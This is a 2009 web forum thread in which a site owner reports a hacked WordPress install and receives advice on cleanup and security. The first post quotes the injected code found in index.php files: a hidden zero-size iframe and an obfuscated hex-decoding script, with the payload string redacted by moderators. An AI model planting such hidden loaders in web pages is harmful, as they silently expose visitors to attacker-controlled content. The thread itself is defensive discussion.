wordpress hacked? - HTML forum at WebmasterWorld - WebmasterWorld

Forum Moderators: open

Message Too Old, No Replies

wordpress hacked?

tomhumf

2:51 pm on May 16, 2009 (gmt 0)

10+ Year Member

Hi,

I've recently set up a wordpress site and it was working fine. Today however, it is constantly receiving and transmitting data from <a certain domain> and I don't know what this is?

I found the code below AFTER the </html> tags in the source code. It isn't in the wordpress footer so I'm not sure how it is getting there...

Any ideas how to get rid? I installed a couple of plugins, maybe this caused it.

///////////////////////////////

I just found the code hidden in the main index.php files of wordpress installation and deleted them out. It's working for now...i need to read the 'securing wordpress' thread

<iframe src="http://example.net/yes/index.php" width="0" height="0" style="display:none;"></iframe><script>function v4a0e9cd17b16a(v4a0e9cd17b553){ function v4a0e9cd17b93a () {var v4a0e9cd17bd23=16; return v4a0e9cd17bd23;} return(parseInt(v4a0e9cd17b553,v4a0e9cd17b93a()));}function v4a0e9cd17c10a(v4a0e9cd17c4f2){ var v4a0e9cd17d0a9=2; var v4a0e9cd17c8db='';for(v4a0e9cd17ccc2=0; v4a0e9cd17ccc2<v4a0e9cd17c4f2.length; v4a0e9cd17ccc2+=v4a0e9cd17d0a9){ v4a0e9cd17c8db+=(String.fromCharCode(v4a0e9cd17b16a(v4a0e9cd17c4f2.substr(v4a0e9cd17ccc2, v4a0e9cd17d0a9))));}return v4a0e9cd17c8db;} document.write(v4a0e9cd17c10a('[long alphanumeric string]'));></script>

[edited by: tedster at 4:27 pm (utc) on May 16, 2009]

[edited by: encyclo at 12:43 am (utc) on June 3, 2009]
[edit reason] obscure parts of the code, for safety [/edit]

tedster

4:32 pm on May 16, 2009 (gmt 0)

WebmasterWorld Senior Member

10+ Year Member

Glad you got it fixed. Now, as you said, it's time to secure your Wordpress installation. There is a whole lot of server hacking these days, especially for Wordpress.

There's a thread in the Google Search forum that covers hacked servers [webmasterworld.com]. There are many different varieties, and they can kill your search traffic.

tomhumf

6:39 pm on May 16, 2009 (gmt 0)

10+ Year Member

I found the code in 3 index.php in wordpress. Would my log files show exactly which files were modified in the hack?

I find them hard to read with windows 'default log viewer' is there anything else I could use to read them more easily on windows?

rickallen

8:13 pm on Jun 2, 2009 (gmt 0)

10+ Year Member

I had a similar problem with code being added to index pages, but it turned out to be a server wide virus deal. If it comes back ask your hosting company about it.

I had a dedicated server and the "virus"/script trashed it.

webdesigncompany

9:01 am on Jun 25, 2009 (gmt 0)

10+ Year Member

Hey guys i have problem with one of my wordpress blog as well.

<snip>

it says

This blog has been archived or suspended for a violation of our

any help would be good as i have lost that very good blog of mine.

[edited by: engine at 9:15 am (utc) on June 25, 2009]
[edit reason] No URLs, see WebmasterWorld TOS [/edit]

tedster

6:57 pm on Jun 25, 2009 (gmt 0)

WebmasterWorld Senior Member

10+ Year Member

Hello webdesigncompany, and welcome to the forums. Click on the link in my earlier post (the linked words are "hacked servers") and you'll find a very complete discussion.